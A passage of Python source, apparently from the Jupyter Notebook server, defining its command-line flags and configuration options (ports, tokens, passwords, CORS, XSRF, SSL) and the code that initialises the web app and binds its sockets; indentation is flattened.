print(url, "::", serverinfo['notebook_dir'])
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'NotebookApp' : {'open_browser' : False}},
_("Don't open the notebook in a browser after startup.")
)
flags['pylab']=(
{'NotebookApp' : {'pylab' : 'warn'}},
_("DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.")
)
flags['no-mathjax']=(
{'NotebookApp' : {'enable_mathjax' : False}},
"""Disable MathJax
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
flags['allow-root']=(
{'NotebookApp' : {'allow_root' : True}},
_("Allow the notebook to be run from root user.")
)
flags['autoreload'] = (
{'NotebookApp': {'autoreload': True}},
"""Autoreload the webapp
Enable reloading of the tornado webapp and all imported Python packages
when any changes are made to any Python src files in Notebook or
extensions.
"""
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileContentsManager.save_script',
'DEPRECATED, IGNORED',
'DEPRECATED, IGNORED'))
aliases = dict(base_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'sock': 'NotebookApp.sock',
'sock-mode': 'NotebookApp.sock_mode',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'client-ca': 'NotebookApp.client_ca',
'notebook-dir': 'NotebookApp.notebook_dir',
'browser': 'NotebookApp.browser',
'pylab': 'NotebookApp.pylab',
'gateway-url': 'GatewayClient.url',
})
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(JupyterApp):
name = 'jupyter-notebook'
version = __version__
description = _("""The Jupyter HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an HTML5/Javascript Notebook client.""")
examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, Session, MappingKernelManager, KernelSpecManager,
ContentsManager, FileContentsManager, NotebookNotary,
GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient,
]
if terminado_available: # Only necessary when terminado is available
classes.append(TerminalManager)
flags = Dict(flags)
aliases = Dict(aliases)
subcommands = dict(
list=(NbserverListApp, NbserverListApp.description.splitlines()[0]),
stop=(NbserverStopApp, NbserverStopApp.description.splitlines()[0]),
password=(NotebookPasswordApp, NotebookPasswordApp.description.splitlines()[0]),
)
_log_formatter_cls = LogFormatter
_json_logging_import_error_logged = False
log_json = Bool(False, config=True,
help=_('Set to True to enable JSON formatted logs. '
'Run "pip install notebook[json-logging]" to install the '
'required dependent packages. Can also be set using the '
'environment variable JUPYTER_ENABLE_JSON_LOGGING=true.')
)
@default('log_json')
def _default_log_json(self):
"""Get the log_json value from the environment."""
return os.getenv('JUPYTER_ENABLE_JSON_LOGGING', 'false').lower() == 'true'
@validate('log_json')
def _validate_log_json(self, proposal):
# If log_json=True, see if the json_logging package can be imported and
# override _log_formatter_cls if so.
value = proposal['value']
if value:
try:
import json_logging
self.log.debug('initializing json logging')
json_logging.init_non_web(enable_json=True)
self._log_formatter_cls = json_logging.JSONLogFormatter
except ImportError:
# If configured for json logs and we can't do it, log a hint.
# Only log the error once though.
if not self._json_logging_import_error_logged:
self.log.warning(
'Unable to use json logging due to missing packages. '
'Run "pip install notebook[json-logging]" to fix.'
)
self._json_logging_import_error_logged = True
value = False
return value
@default('log_level')
def _default_log_level(self):
return logging.INFO
@default('log_datefmt')
def _default_log_datefmt(self):
"""Exclude date from default date format"""
return "%H:%M:%S"
@default('log_format')
def _default_log_format(self):
"""override default log format to include time"""
return u"%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s"
ignore_minified_js = Bool(False,
config=True,
help=_('Deprecated: Use minified JS file or not, mainly use during dev to avoid JS recompilation'),
)
# file to be opened in the notebook server
file_to_run = Unicode('', config=True)
# Network related information
allow_origin = Unicode('', config=True,
help="""Set the Access-Control-Allow-Origin header
Use '*' to allow any origin to access your server.
Takes precedence over allow_origin_pat.
"""
)
allow_origin_pat = Unicode('', config=True,
help="""Use a regular expression for the Access-Control-Allow-Origin header
Requests from an origin matching the expression will get replies with:
Access-Control-Allow-Origin: origin
where `origin` is the origin of the request.
Ignored if allow_origin is set.
"""
)
allow_credentials = Bool(False, config=True,
help=_("Set the Access-Control-Allow-Credentials: true header")
)
allow_root = Bool(False, config=True,
help=_("Whether to allow the user to run the notebook as root.")
)
use_redirect_file = Bool(True, config=True,
help="""Disable launching browser by redirect file
For versions of notebook > 5.7.2, a security feature measure was added that
prevented the authentication token used to launch the browser from being visible.
This feature makes it difficult for other users on a multi-user system from
running code in your Jupyter session as you.
However, some environments (like Windows Subsystem for Linux (WSL) and Chromebooks),
launching a browser using a redirect file can lead the browser failing to load.
This is because of the difference in file structures/paths between the runtime and
the browser.
Disabling this setting to False will disable this behavior, allowing the browser
to launch by using a URL and visible token (as before).
"""
)
autoreload = Bool(False, config=True,
help= ("Reload the webapp when changes are made to any Python src files.")
)
default_url = Unicode('/tree', config=True,
help=_("The default URL to redirect to from `/`")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on.")
)
@default('ip')
def _default_ip(self):
"""Return localhost if available, 127.0.0.1 otherwise.
On some (horribly broken) systems, localhost cannot be bound.
"""
s = socket.socket()
try:
s.bind(('localhost', 0))
except socket.error as e:
self.log.warning(_("Cannot bind to localhost, using 127.0.0.1 as default ip\n%s"), e)
return '127.0.0.1'
else:
s.close()
return 'localhost'
@validate('ip')
def _validate_ip(self, proposal):
value = proposal['value']
if value == u'*':
value = u''
return value
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example).""")
)
port_env = 'JUPYTER_PORT'
port_default_value = DEFAULT_NOTEBOOK_PORT
port = Integer(port_default_value, config=True,
help=_("The port the notebook server will listen on (env: JUPYTER_PORT).")
)
@default('port')
def port_default(self):
return int(os.getenv(self.port_env, self.port_default_value))
port_retries_env = 'JUPYTER_PORT_RETRIES'
port_retries_default_value = 50
port_retries = Integer(port_retries_default_value, config=True,
help=_("The number of additional ports to try if the specified port is not "
"available (env: JUPYTER_PORT_RETRIES).")
)
@default('port_retries')
def port_retries_default(self):
return int(os.getenv(self.port_retries_env, self.port_retries_default_value))
sock = Unicode(u'', config=True,
help=_("The UNIX socket the notebook server will listen on.")
)
sock_mode = Unicode('0600', config=True,
help=_("The permissions mode for UNIX socket creation (default: 0600).")
)
@validate('sock_mode')
def _validate_sock_mode(self, proposal):
value = proposal['value']
try:
converted_value = int(value.encode(), 8)
assert all((
# Ensure the mode is at least user readable/writable.
bool(converted_value & stat.S_IRUSR),
bool(converted_value & stat.S_IWUSR),
# And isn't out of bounds.
converted_value <= 2 ** 12
))
except ValueError as e:
raise TraitError(
'invalid --sock-mode value: %s, please specify as e.g. "0600"' % value
) from e
except AssertionError as e:
raise TraitError(
'invalid --sock-mode value: %s, must have u+rw (0600) at a minimum' % value
) from e
return value
certfile = Unicode(u'', config=True,
help=_("""The full path to an SSL/TLS certificate file.""")
)
keyfile = Unicode(u'', config=True,
help=_("""The full path to a private key file for usage with SSL/TLS.""")
)
client_ca = Unicode(u'', config=True,
help=_("""The full path to a certificate authority certificate for SSL/TLS client authentication.""")
)
cookie_secret_file = Unicode(config=True,
help=_("""The file where the cookie secret is stored.""")
)
@default('cookie_secret_file')
def _default_cookie_secret_file(self):
return os.path.join(self.runtime_dir, 'notebook_cookie_secret')
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
@default('cookie_secret')
def _default_cookie_secret(self):
if os.path.exists(self.cookie_secret_file):
with io.open(self.cookie_secret_file, 'rb') as f:
key = f.read()
else:
key = encodebytes(os.urandom(32))
self._write_cookie_secret_file(key)
h = hmac.new(key, digestmod=hashlib.sha256)
h.update(self.password.encode())
return h.digest()
def _write_cookie_secret_file(self, secret):
"""write my secret to my secret_file"""
self.log.info(_("Writing notebook server cookie secret to %s"), self.cookie_secret_file)
try:
with io.open(self.cookie_secret_file, 'wb') as f:
f.write(secret)
except OSError as e:
self.log.error(_("Failed to write cookie secret to %s: %s"),
self.cookie_secret_file, e)
try:
os.chmod(self.cookie_secret_file, 0o600)
except OSError:
self.log.warning(
_("Could not set permissions on %s"),
self.cookie_secret_file
)
token = Unicode('<generated>',
help=_("""Token used for authenticating first-time connections to the server.
The token can be read from the file referenced by JUPYTER_TOKEN_FILE or set directly
with the JUPYTER_TOKEN environment variable.
When no password is enabled,
the default is to generate a new, random token.
Setting to an empty string disables authentication altogether, which is NOT RECOMMENDED.
""")
).tag(config=True)
_token_generated = True
@default('token')
def _token_default(self):
if os.getenv('JUPYTER_TOKEN'):
self._token_generated = False
return os.getenv('JUPYTER_TOKEN')
if os.getenv('JUPYTER_TOKEN_FILE'):
self._token_generated = False
with io.open(os.getenv('JUPYTER_TOKEN_FILE'), "r") as token_file:
return token_file.read()
if self.password:
# no token if password is enabled
self._token_generated = False
return u''
else:
self._token_generated = True
return binascii.hexlify(os.urandom(24)).decode('ascii')
max_body_size = Integer(512 * 1024 * 1024, config=True,
help="""
Sets the maximum allowed size of the client request body, specified in
the Content-Length request header field. If the size in a request
exceeds the configured value, a malformed HTTP message is returned to
the client.
Note: max_body_size is applied even in streaming mode.
"""
)
max_buffer_size = Integer(512 * 1024 * 1024, config=True,
help="""
Gets or sets the maximum amount of memory, in bytes, that is allocated
for use by the buffer manager.
"""
)
min_open_files_limit = Integer(config=True,
help="""
Gets or sets a lower bound on the open file handles process resource
limit. This may need to be increased if you run into an
OSError: [Errno 24] Too many open files.
This is not applicable when running on Windows.
""")
@default('min_open_files_limit')
def _default_min_open_files_limit(self):
if resource is None:
# Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)
return None
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
DEFAULT_SOFT = 4096
if hard >= DEFAULT_SOFT:
return DEFAULT_SOFT
self.log.debug("Default value for min_open_files_limit is ignored (hard=%r, soft=%r)", hard, soft)
return soft
@observe('token')
def _token_changed(self, change):
self._token_generated = False
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from notebook.auth import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
password_required = Bool(False, config=True,
help="""Forces users to use a password for the Notebook server.
This is useful in a multi user environment, for instance when
everybody in the LAN can access each other's machine through ssh.
In such a case, serving the notebook server on localhost is not secure
since any user can connect to the notebook server via ssh.
"""
)
allow_password_change = Bool(True, config=True,
help="""Allow password to be changed at login for the notebook server.
While loggin in with a token, the notebook server UI will give the opportunity to
the user to enter a new password at the same time that will replace
the token login mechanism.
This can be set to false to prevent changing password from the UI/API.
"""
)
disable_check_xsrf = Bool(False, config=True,
help="""Disable cross-site-request-forgery protection
Jupyter notebook 4.3.1 introduces protection from cross-site request forgeries,
requiring API requests to either:
- originate from pages served by this server (validated with XSRF cookie and token), or
- authenticate with a token
Some anonymous compute resources still desire the ability to run code,
completely without authentication.
These services can disable all authentication and security checks,
with the full knowledge of what that implies.
"""
)
allow_remote_access = Bool(config=True,
help="""Allow requests where the Host header doesn't point to a local server
By default, requests get a 403 forbidden response if the 'Host' header
shows that the browser thinks it's on a non-local domain.
Setting this option to True disables this check.
This protects against 'DNS rebinding' attacks, where a remote web server
serves you a page and then changes its DNS to send later requests to a
local IP, bypassing same-origin checks.
Local IP addresses (such as 127.0.0.1 and ::1) are allowed as local,
along with hostnames configured in local_hostnames.
""")
@default('allow_remote_access')
def _default_allow_remote(self):
"""Disallow remote access if we're listening only on loopback addresses"""
# if blank, self.ip was configured to "*" meaning bind to all interfaces,
# see _valdate_ip
if self.ip == "":
return True
try:
addr = ipaddress.ip_address(self.ip)
except ValueError:
# Address is a hostname
for info in socket.getaddrinfo(self.ip, self.port, 0, socket.SOCK_STREAM):
addr = info[4][0]
if not py3compat.PY3:
addr = addr.decode('ascii')
try:
parsed = ipaddress.ip_address(addr.split('%')[0])
except ValueError:
self.log.warning("Unrecognised IP address: %r", addr)
continue
# Macs map localhost to 'fe80::1%lo0', a link local address
# scoped to the loopback interface. For now, we'll assume that
# any scoped link-local address is effectively local.
if not (parsed.is_loopback
or (('%' in addr) and parsed.is_link_local)):
return True
return False
else:
return not addr.is_loopback
local_hostnames = List(Unicode(), ['localhost'], config=True,
help="""Hostnames to allow as local when allow_remote_access is False.
Local IP addresses (such as 127.0.0.1 and ::1) are automatically accepted
as local as well.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
webapp_settings = Dict(config=True,
help=_("DEPRECATED, use tornado_settings")
)
@observe('webapp_settings')
def _update_webapp_settings(self, change):
self.log.warning(_("\n webapp_settings is deprecated, use tornado_settings.\n"))
self.tornado_settings = change['new']
tornado_settings = Dict(config=True,
help=_("Supply overrides for the tornado.web.Application that the "
"Jupyter notebook uses."))
websocket_compression_options = Any(None, config=True,
help=_("""
Set the tornado compression options for websocket connections.
This value will be returned from :meth:`WebSocketHandler.get_compression_options`.
None (default) will disable compression.
A dict (even an empty one) will enable compression.
See the tornado docs for WebSocketHandler.get_compression_options for details.
""")
)
terminado_settings = Dict(config=True,
help=_('Supply overrides for terminado. Currently only supports "shell_command". '
'On Unix, if "shell_command" is not provided, a non-login shell is launched '
"by default when the notebook server is connected to a terminal, a login "
"shell otherwise."))
cookie_options = Dict(config=True,
help=_("Extra keyword arguments to pass to `set_secure_cookie`."
" See tornado's set_secure_cookie docs for details.")
)
get_secure_cookie_kwargs = Dict(config=True,
help=_("Extra keyword arguments to pass to `get_secure_cookie`."
" See tornado's get_secure_cookie docs for details.")
)
ssl_options = Dict(config=True,
help=_("""Supply SSL options for the tornado HTTPServer.
See the tornado docs for details."""))
jinja_environment_options = Dict(config=True,
help=_("Supply extra arguments that will be passed to Jinja environment."))
jinja_template_vars = Dict(
config=True,
help=_("Extra variables to supply to jinja templates when rendering."),
)
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
@observe('enable_mathjax')
def _update_enable_mathjax(self, change):
"""set mathjax url to empty if mathjax is disabled"""
if not change['new']:
self.mathjax_url = u''
base_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
@validate('base_url')
def _update_base_url(self, proposal):
value = proposal['value']
if not value.startswith('/'):
value = '/' + value
if not value.endswith('/'):
value = value + '/'
return value
base_project_url = Unicode('/', config=True, help=_("""DEPRECATED use base_url"""))
@observe('base_project_url')
def _update_base_project_url(self, change):
self.log.warning(_("base_project_url is deprecated, use base_url"))
self.base_url = change['new']
extra_static_paths = List(Unicode(), config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
or overriding individual files in the IPython"""
)
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
static_custom_path = List(Unicode(),
help=_("""Path to search for custom.js, css""")
)
@default('static_custom_path')
def _default_static_custom_path(self):
return [
os.path.join(d, 'custom') for d in (
self.config_dir,
DEFAULT_STATIC_FILES_PATH)
]
extra_template_paths = List(Unicode(), config=True,
help=_("""Extra paths to search for serving jinja templates.
Can be used to override templates from notebook.templates.""")
)
@property
def template_file_path(self):
"""return extra paths + the default locations"""
return self.extra_template_paths + DEFAULT_TEMPLATE_PATH_LIST
extra_nbextensions_path = List(Unicode(), config=True,
help=_("""extra paths to look for Javascript notebook extensions""")
)
extra_services = List(Unicode(), config=True,
help=_("""handlers that should be loaded at higher priority than the default services""")
)
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = self.extra_nbextensions_path + jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
websocket_url = Unicode("", config=True,
help="""The base URL for websockets,
if it differs from the HTTP server (hint: it almost certainly doesn't).
Should be in the form of an HTTP origin: ws[s]://hostname[:port]
"""
)
mathjax_url = Unicode("", config=True,
help="""A custom url for MathJax.js.
Should be in the form of a case-sensitive url to MathJax,
for example: /static/components/MathJax/MathJax.js
"""
)
@default('mathjax_url')
def _default_mathjax_url(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.tornado_settings.get("static_url_prefix", "static")
return url_path_join(static_url_prefix, 'components', 'MathJax', 'MathJax.js')
@observe('mathjax_url')
def _update_mathjax_url(self, change):
new = change['new']
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info(_("Using MathJax: %s"), new)
mathjax_config = Unicode("TeX-AMS-MML_HTMLorMML-full,Safe", config=True,
help=_("""The MathJax.js configuration file that is to be used.""")
)
@observe('mathjax_config')
def _update_mathjax_config(self, change):
self.log.info(_("Using MathJax configuration file: %s"), change['new'])
quit_button = Bool(True, config=True,
help="""If True, display a button in the dashboard to quit
(shutdown the notebook server)."""
)
contents_manager_class = Type(
default_value=LargeFileManager,
klass=ContentsManager,
config=True,
help=_('The notebook manager class to use.')
)
kernel_manager_class = Type(
default_value=MappingKernelManager,
klass=MappingKernelManager,
config=True,
help=_('The kernel manager class to use.')
)
session_manager_class = Type(
default_value=SessionManager,
config=True,
help=_('The session manager class to use.')
)
config_manager_class = Type(
default_value=ConfigManager,
config = True,
help=_('The config manager class to use')
)
kernel_spec_manager = Instance(KernelSpecManager, allow_none=True)
kernel_spec_manager_class = Type(
default_value=KernelSpecManager,
config=True,
help="""
The kernel spec manager class to use. Should be a subclass
of `jupyter_client.kernelspec.KernelSpecManager`.
The Api of KernelSpecManager is provisional and might change
without warning between this version of Jupyter and the next stable one.
"""
)
login_handler_class = Type(
default_value=LoginHandler,
klass=web.RequestHandler,
config=True,
help=_('The login handler class to use.'),
)
logout_handler_class = Type(
default_value=LogoutHandler,
klass=web.RequestHandler,
config=True,
help=_('The logout handler class to use.'),
)
trust_xheaders = Bool(False, config=True,
help=(_("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL"))
)
info_file = Unicode()
@default('info_file')
def _default_info_file(self):
info_file = "nbserver-%s.json" % os.getpid()
return os.path.join(self.runtime_dir, info_file)
browser_open_file = Unicode()
@default('browser_open_file')
def _default_browser_open_file(self):
basename = "nbserver-%s-open.html" % os.getpid()
return os.path.join(self.runtime_dir, basename)
pylab = Unicode('disabled', config=True,
help=_("""
DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
""")
)
@observe('pylab')
def _update_pylab(self, change):
"""when --pylab is specified, display a warning and exit"""
if change['new'] != 'warn':
backend = ' %s' % change['new']
else:
backend = ''
self.log.error(_("Support for specifying --pylab on the command line has been removed."))
self.log.error(
_("Please use `%pylab{0}` or `%matplotlib{0}` in the notebook itself.").format(backend)
)
self.exit(1)
notebook_dir = Unicode(config=True,
help=_("The directory to use for notebooks and kernels.")
)
@default('notebook_dir')
def _default_notebook_dir(self):
if self.file_to_run:
return os.path.dirname(os.path.abspath(self.file_to_run))
else:
return py3compat.getcwd()
@validate('notebook_dir')
def _notebook_dir_validate(self, proposal):
value = proposal['value']
# Strip any trailing slashes
# *except* if it's root
_, path = os.path.splitdrive(value)
if path == os.sep:
return value
value = value.rstrip(os.sep)
if not os.path.isabs(value):
# If we receive a non-absolute path, make it absolute.
value = os.path.abspath(value)
if not os.path.isdir(value):
raise TraitError(trans.gettext("No such notebook dir: '%r'") % value)
return value
# TODO: Remove me in notebook 5.0
server_extensions = List(Unicode(), config=True,
help=(_("DEPRECATED use the nbserver_extensions dict instead"))
)
@observe('server_extensions')
def _update_server_extensions(self, change):
self.log.warning(_("server_extensions is deprecated, use nbserver_extensions"))
self.server_extensions = change['new']
nbserver_extensions = Dict({}, config=True,
help=(_("Dict of Python modules to load as notebook server extensions."
"Entry values can be used to enable and disable the loading of"
"the extensions. The extensions will be loaded in alphabetical "
"order."))
)
reraise_server_extension_failures = Bool(
False,
config=True,
help=_("Reraise exceptions encountered loading server extensions?"),
)
iopub_msg_rate_limit = Float(1000, config=True, help=_("""(msgs/sec)
Maximum rate at which messages can be sent on iopub before they are
limited."""))
iopub_data_rate_limit = Float(1000000, config=True, help=_("""(bytes/sec)
Maximum rate at which stream output can be sent on iopub before they are
limited."""))
rate_limit_window = Float(3, config=True, help=_("""(sec) Time window used to
check the message and data rate limits."""))
shutdown_no_activity_timeout = Integer(0, config=True,
help=("Shut down the server after N seconds with no kernels or "
"terminals running and no activity. "
"This can be used together with culling idle kernels "
"(MappingKernelManager.cull_idle_timeout) to "
"shutdown the notebook server when it's not in use. This is not "
"precisely timed: it may shut down up to a minute later. "
"0 (the default) disables this automatic shutdown.")
)
terminals_enabled = Bool(True, config=True,
help=_("""Set to False to disable terminals.
This does *not* make the notebook server more secure by itself.
Anything the user can in a terminal, they can also do in a notebook.
Terminals may also be automatically disabled if the terminado package
is not available.
"""))
authenticate_prometheus = Bool(
True,
help=""""
Require authentication to access prometheus metrics.
"""
).tag(config=True)
# Since use of terminals is also a function of whether the terminado package is
# available, this variable holds the "final indication" of whether terminal functionality
# should be considered (particularly during shutdown/cleanup). It is enabled only
# once both the terminals "service" can be initialized and terminals_enabled is True.
# Note: this variable is slightly different from 'terminals_available' in the web settings
# in that this variable *could* remain false if terminado is available, yet the terminal
# service's initialization still fails. As a result, this variable holds the truth.
terminals_available = False
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
arg0 = self.extra_args[0]
f = os.path.abspath(arg0)
self.argv.remove(arg0)
if not os.path.exists(f):
self.log.critical(_("No such file or directory: %s"), f)
self.exit(1)
# Use config here, to ensure that it takes higher priority than
# anything that comes from the config dirs.
c = Config()
if os.path.isdir(f):
c.NotebookApp.notebook_dir = f
elif os.path.isfile(f):
c.NotebookApp.file_to_run = f
self.update_config(c)
def init_configurables(self):
# If gateway server is configured, replace appropriate managers to perform redirection. To make
# this determination, instantiate the GatewayClient config singleton.
self.gateway_config = GatewayClient.instance(parent=self)
if self.gateway_config.gateway_enabled:
self.kernel_manager_class = 'notebook.gateway.managers.GatewayKernelManager'
self.session_manager_class = 'notebook.gateway.managers.GatewaySessionManager'
self.kernel_spec_manager_class = 'notebook.gateway.managers.GatewayKernelSpecManager'
self.kernel_spec_manager = self.kernel_spec_manager_class(
parent=self,
)
self.kernel_manager = self.kernel_manager_class(
parent=self,
log=self.log,
connection_dir=self.runtime_dir,
kernel_spec_manager=self.kernel_spec_manager,
)
# Ensure the appropriate version of Python and jupyter_client is available.
if isinstance(self.kernel_manager, AsyncMappingKernelManager):
if sys.version_info < (3, 6): # Can be removed once 3.5 is dropped.
raise ValueError("You are using `AsyncMappingKernelManager` in Python 3.5 (or lower) "
"which is not supported. Please upgrade Python to 3.6+ or change kernel managers.")
if not async_kernel_mgmt_available: # Can be removed once jupyter_client >= 6.1 is required.
raise ValueError("You are using `AsyncMappingKernelManager` without an appropriate "
"jupyter_client installed! Please upgrade jupyter_client or change kernel managers.")
self.log.info("Asynchronous kernel management has been configured to use '{}'.".
format(self.kernel_manager.__class__.__name__))
self.contents_manager = self.contents_manager_class(
parent=self,
log=self.log,
)
self.session_manager = self.session_manager_class(
parent=self,
log=self.log,
kernel_manager=self.kernel_manager,
contents_manager=self.contents_manager,
)
self.config_manager = self.config_manager_class(
parent=self,
log=self.log,
)
def init_logging(self):
# This prevents double log messages because tornado use a root logger that
# self.log is a child of. The logging module dispatches log messages to a log
# and all of its ancenstors until propagate is set to False.
self.log.propagate = False
for log in app_log, access_log, gen_log:
# consistent log output name (NotebookApp instead of tornado.access, etc.)
log.name = self.log.name
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_resources(self):
"""initialize system resources"""
if resource is None:
self.log.debug('Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)')
return
old_soft, old_hard = resource.getrlimit(resource.RLIMIT_NOFILE)
soft = self.min_open_files_limit
hard = old_hard
if old_soft < soft:
if hard < soft:
hard = soft
self.log.debug(
'Raising open file limit: soft {}->{}; hard {}->{}'.format(old_soft, soft, old_hard, hard)
)
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.tornado_settings['allow_origin'] = self.allow_origin
self.tornado_settings['websocket_compression_options'] = self.websocket_compression_options
if self.allow_origin_pat:
self.tornado_settings['allow_origin_pat'] = re.compile(self.allow_origin_pat)
self.tornado_settings['allow_credentials'] = self.allow_credentials
self.tornado_settings['autoreload'] = self.autoreload
self.tornado_settings['cookie_options'] = self.cookie_options
self.tornado_settings['get_secure_cookie_kwargs'] = self.get_secure_cookie_kwargs
self.tornado_settings['token'] = self.token
# ensure default_url starts with base_url
if not self.default_url.startswith(self.base_url):
self.default_url = url_path_join(self.base_url, self.default_url)
if self.password_required and (not self.password):
self.log.critical(_("Notebook servers are configured to only be run with a password."))
self.log.critical(_("Hint: run the following command to set a password"))
self.log.critical(_("\t$ python -m notebook.auth password"))
sys.exit(1)
# Socket options validation.
if self.sock:
if self.port != DEFAULT_NOTEBOOK_PORT:
self.log.critical(
_('Options --port and --sock are mutually exclusive. Aborting.'),
)
sys.exit(1)
else:
# Reset the default port if we're using a UNIX socket.
self.port = 0
if self.open_browser:
# If we're bound to a UNIX socket, we can't reliably connect from a browser.
self.log.info(
_('Ignoring --NotebookApp.open_browser due to --sock being used.'),
)
if self.file_to_run:
self.log.critical(
_('Options --NotebookApp.file_to_run and --sock are mutually exclusive.'),
)
sys.exit(1)
if sys.platform.startswith('win'):
self.log.critical(
_('Option --sock is not supported on Windows, but got value of %s. Aborting.' % self.sock),
)
sys.exit(1)
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.contents_manager,
self.session_manager, self.kernel_spec_manager,
self.config_manager, self.extra_services,
self.log, self.base_url, self.default_url, self.tornado_settings,
self.jinja_environment_options,
)
ssl_options = self.ssl_options
if self.certfile:
ssl_options['certfile'] = self.certfile
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
if self.client_ca:
ssl_options['ca_certs'] = self.client_ca
if not ssl_options:
# None indicates no SSL config
ssl_options = None
else:
# SSL may be missing, so only import it if it's to be used
import ssl
# PROTOCOL_TLS selects the highest ssl/tls protocol version that both the client and
# server support. When PROTOCOL_TLS is not available use PROTOCOL_SSLv23.
# PROTOCOL_TLS is new in version 2.7.13, 3.5.3 and 3.6
ssl_options.setdefault(
'ssl_version',
getattr(ssl, 'PROTOCOL_TLS', ssl.PROTOCOL_SSLv23)
)
if ssl_options.get('ca_certs', False):
ssl_options.setdefault('cert_reqs', ssl.CERT_REQUIRED)
self.login_handler_class.validate_security(self, ssl_options=ssl_options)
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders,
max_body_size=self.max_body_size,
max_buffer_size=self.max_buffer_size)
success = self._bind_http_server()
if not success:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
self.exit(1)
def _bind_http_server(self):
return self._bind_http_server_unix() if self.sock else self._bind_http_server_tcp()
def _bind_http_server_unix(self):
if unix_socket_in_use(self.sock):
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
try:
sock = bind_unix_socket(self.sock, mode=int(self.sock_mode.encode(), 8))
self.http_server.add_socket(sock)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on sock %s denied") % self.sock)
return False
else:
raise
else:
return True
def _bind_http_server_tcp(self):
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
eacces = (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES))
if sys.platform == 'cygwin':
# Cygwin has a bug that causes EPERM to be returned in this
# case instead of EACCES:
# https://cygwin.com/ml/cygwin/2019-04/msg00160.html
eacces += (errno.EPERM,)
if e.errno == errno.EADDRINUSE:
if self.port_retries:
self.log.info(_('The port %i is already in use, trying another port.') % port)
else:
self.log.info(_('The port %i is already in use.') % port)
continue
elif e.errno in eacces:
